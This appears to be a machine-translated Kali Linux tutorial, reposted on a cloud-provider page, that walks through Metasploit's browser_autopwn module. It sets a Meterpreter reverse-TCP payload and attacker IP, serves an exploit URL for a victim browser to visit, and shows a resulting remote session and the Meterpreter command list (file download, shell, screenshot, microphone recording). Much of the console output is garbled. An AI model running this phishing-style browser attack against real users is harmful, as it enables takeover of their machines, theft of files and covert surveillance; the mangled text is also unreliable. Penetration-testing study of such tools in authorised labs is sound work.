The AUTOPWN described in this article is the autopwn that comes with Kali.
Not the autopwn that was deleted relative to BT5.
1. Open Msfconsole, find the Autopwn directory and use
MSF > Search autopwnmatching Modules================ Name disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/server/ Browser_autopwn normal > Use auxiliary/server/
2. Configure Show Options View
MSF auxiliary (BROWSER_AUTOPWN) > Set Payload windows/meterpreter/reverse_tcp
Payload = Windows/meterpreter/reverse_tcp
MSF auxiliary (BROWSER_AUTOPWN) > Set lhost 192.168.154.133
Lhost = 192.168.154.133
MSF auxiliary (BROWSER_AUTOPWN) > Show options
Module Options (AUXILIARY/SERVER/BROWSER_AUTOPWN):
Name Current Setting Required Description
---- --------------- -------- -----------
Lhost 192.168.154.133 Yes the IP address to use for reverse-connect payloads
Srvhost 0.0.0.0 Yes the local host to listen on. This must is an address on the local machine or 0.0.0.0
Srvport 8080 Yes the local port to listen on.
SSL False no Negotiate SSL for incoming connections
Sslcert no Path to a custom SSL certificate (default is randomly generated)
Uripath no the URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
MSF auxiliary (BROWSER_AUTOPWN) >
3. Start Fishing
MSF auxiliary (BROWSER_AUTOPWN) > Exploit
[*] Auxiliary module execution completed
[*] Setup
[*] obfuscating initial JavaScript 2015-03-29 13:30:57 +0800
MSF auxiliary (BROWSER_AUTOPWN) > [*] done in 1.298861072 seconds
[*] Starting exploit modules on host 192.168.154.133 ...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL:HTTP://0.0.0.0:8080/CQTFDFXCWFC
[*] Local IP:HTTP://192.168.154.133:8080/CQTFDFXCWFC
[*] Server started.
4. Wait for the other browser to access
Http://192.168.154.133:8080/fMOGHtWS
[*] Sending stage (30355bytes) to192.168.154.136[*] Meterpreter session1Opened (192.168.154.133:7777-192.168.154.136:1083) at --Geneva- in -: $: ++0800[*] Session ID1(192.168.154.133:7777-192.168.154.136:1083) Processing Initialautorunscript'migrate-f'
5. Start a session
MSF auxiliary (BROWSER_AUTOPWN) > Sessions-lactive Sessions===============Id Type Information Connection-- ---- ----------- ----------1Meterpreter Java/java admin @ admin-ca9ac4217192.168.154.133:7777-192.168.154.136:1083(192.168.154.136) MSF Auxiliary (BROWSER_AUTOPWN)> Sessions-i1[*] Starting interaction with1. .. meterpreter>
6. The session is
Meterpreter >> sysinfocomputer : admin-ca9ac4217os 5.1 (x86) Meterpreter:java/java
Meterpreter >Helpcore Commands=============Command Description------- ----------- ?Help menu Background backgrounds The current session Bgkill Kills a background Meterpreter script bglist Lists running background scripts Bgrun Executes a meterpreter script asA background thread channel displays information about active channels close Closes a channel disable_unicode_encoding disables encoding of Unicode strings enable_unicode_encoding enable s encoding of Unicode strings exit Terminate the Meterpreter session Help Help Menu Info Displays information about a Post module interact interacts wit H a channel IRB Drop into IRB scripting mode load load one or more Meterp Reter extensions quit Terminate the Meterpreter session read Reads data
froma channel resource Run the commands storedincha file run executes a meterpreter script or Post module use Depreca Ted Alias for 'Load'write writes data to a channelstdapi:file system Commands============================Command Description------- -----------Cat Read The contents of a file to the screens CD change directory download Downloa d a file or directory edit edit a file getlwd print local working directory GETWD print W Orking Directory LCD change local working directory lpwd Print Local working directory LS List files mkdir make directory pwd Print working directory RM Delete the SPE cified file rmdir Remove Directory search Search forfiles upload upload a file or directorystdapi:networking Commands===========================Command Description------- -----------ifconfig display interfaces ipconfig display interfaces PORTFWD Forward a local port to a re Mote Service Route View and modify the routing Tablestdapi:system Commands=======================Command Description------- -----------Execute execute a command getuid Get the user that the server isRunning asPS List Running processes Shell Drop into a system command shell SysInfo Gets infor Mation about the remote system, such asOsstdapi:userInterfaceCommands===============================Command Description------- -----------screenshot Grab A screenshot of the interactive Desktopstdapi:webcam Commands=======================Command Description------- -----------record_mic Record Audio fromThedefaultMicrophone forX Secondsmeterpreter>
Kali Metasploit Autopwn Browser fishing, Java vulnerability
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
